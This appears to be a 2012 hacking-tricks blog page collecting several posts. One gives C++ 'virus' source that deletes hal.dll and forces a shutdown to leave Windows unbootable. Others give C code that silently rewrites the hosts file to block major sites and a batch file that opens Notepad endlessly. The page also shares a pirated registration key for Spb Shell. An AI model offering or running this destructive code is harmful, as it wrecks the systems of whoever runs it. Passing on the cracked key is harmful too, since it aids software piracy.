Welcome to pctricksstuff.com for more updates like us on facebook

Pages

Labels

Wednesday 2 May 2012

C++ Virus


This is a powerful C++ virus, which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again.

Warning: Do not try this on your home computer.

The Original Code:
Code:
#include
#include
using namespace std;
int main(int argc, char *argv[])
{
std::remove(“C:\\windows\\system32\\hal.dll”); //PWNAGE TIME
system(“shutdown -s -r”);
system(“PAUSE”);
return EXIT_SUCCESS;
}

A more advanced version of this virus which makes the C:\Windows a variable that cannot be wrong. Here it is:

Code:
#include
#include
using namespace std;
int main(int argc, char *argv[])
{
std::remove(“%systemroot%\\system32\\hal.dll”); //PWNAGE TIME
system(“shutdown -s -r”);
system(“PAUSE”);
return EXIT_SUCCESS;
}

Try this At Your Own Risk

Blocking Any Website


#include<stdio.h>
#include<dos.h>
#include<dir.h>
char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1?;
FILE *target;

int find_root(void);
void block_site(void);

int find_root()
{
int done;
struct ffblk ffblk;//File block structure

done=findfirst(“C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(“D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(“E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(“F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

else return 0;
}

void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/

fprintf(target,”\n”);
for(i=0;i<6;i++)
fprintf(target,”%s\t%s\n”,ip,site_list[i]);
fclose(target);
}

void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}


That's it By This c++ Program You Can Block Any Website.

Hide Your Data Into Images Audio Or Anything


Ever wondered to know how to hide secret messages in images, audio and video files?

Well, in this post I will take you through a concept called steganography using which, it is possible to hide your secret information in image files, songs or any other file of your choice.

At the end of this post, you can also download free stegnographic tools and start hiding your data.



> What Is Stenography ?

Stegnography tools implement intelligent algorithms to carefully embed the encrypted text messages or data inside other larger files such as an image, audio, video or an executable file.

Some tools will embed the encrypted data at the end of another file so that there will be enough room for storing larger data.

There are many stenography tools available online but only a few are able to work  flawlessly.


The Ultimate Call Recorder

Hi Do You Want Record All Your Incoming Or Outgoing Calls.

Then Here Is The Software Through Which U can Record All Your Calls.

This Software Is For The Nokia Symbian Based Phones.

The Ultimate Call Recorder.




So To Download The Ultimate Call Recorder Here Is The Download Link.

Download Link

So Download This Software And Record All Calls And Enjoy.

Spb Shell 3.7

Do You Want To Change Your Mobile  Look Then Here Is The Tool.

Spb Shell 3.7 For Nokia Symbian Phones .



You Can Download It Free Here .

 Here Is The Download Link .

Download Link

After U Download Spb Shell 3.7 It Would Be A Demo So It Will Ask For Registration After 15 Days Trial.

So Here Is The Registration Key For Spb shell 3.7 .

8C5C84Q8DJTC

If This Key Doesn't Work Then U Can Mail Me For Another Registration Key At

luvgandhi9@gmail.com

So Download This Software And Enjoy.


Opening Notepad Continuously


Open Your Notepad Continuously



Open Notepad and Type the following code :

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as abc.bat. After saving just double click on the file to execute the file.

By pasting above code in the notepad u will see that ur notepad is continuously opeaning.

Try this trick .